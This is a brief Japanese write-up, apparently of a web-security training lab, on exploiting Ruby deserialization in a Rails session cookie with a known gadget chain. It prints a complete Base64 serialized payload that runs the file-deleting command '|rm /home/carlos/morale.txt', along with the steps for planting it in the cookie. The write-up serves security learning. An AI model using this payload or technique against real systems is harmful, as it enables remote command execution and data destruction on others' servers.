Hello there, ('ω')ノ
文書化されたガジェットチェーンを使用したRubyの逆シリアル化の活用を。
シリアル化ベースのセッションメカニズムと。
Ruby onRailsフレームワークを使用するとこのことで。
まずは、ログインして。
wiener/peter
セッションCookieにシリアル化されたRubyオブジェクトが含まれていて。
下記サイトからRuby2.xのペイロードを生成するためのスクリプトをコピーして。
https://www.elttam.com/blog/ruby-deserialization/
ファイルを作成して。
下記のファイル内で、削除するコマンドに変更して。
|rm /home/carlos/morale.txt
スクリプトを実行すると。
ペイロードを含むシリアル化されたオブジェクトが生成されて。
出力された16進バージョンのオブジェクトではなく。
Base64エンコードバージョンをコピーして。
BAhVOhVHZW06OlJlcXVpcmVtZW50WwZvOhhHZW06OkRlcGVuZGVuY3lMaXN0
BzoLQHNwZWNzWwdvOh5HZW06OlNvdXJjZTo6U3BlY2lmaWNGaWxlBjoKQHNw
ZWNvOhtHZW06OlN0dWJTcGVjaWZpY2F0aW9uBjoRQGxvYWRlZF9mcm9tSSIg
fHJtIC9ob21lL2Nhcmxvcy9tb3JhbGUudHh0BjoGRVRvOwgAOhFAZGV2ZWxv
cG1lbnRG
Burpのデコーダへ貼り付けて、改行を削除して。
Base64のデコードで内容を確認して。
URLエンコードして。
Cookieを入れ替えて実行すると。
クリアできた。
Best regards, (^^ゞ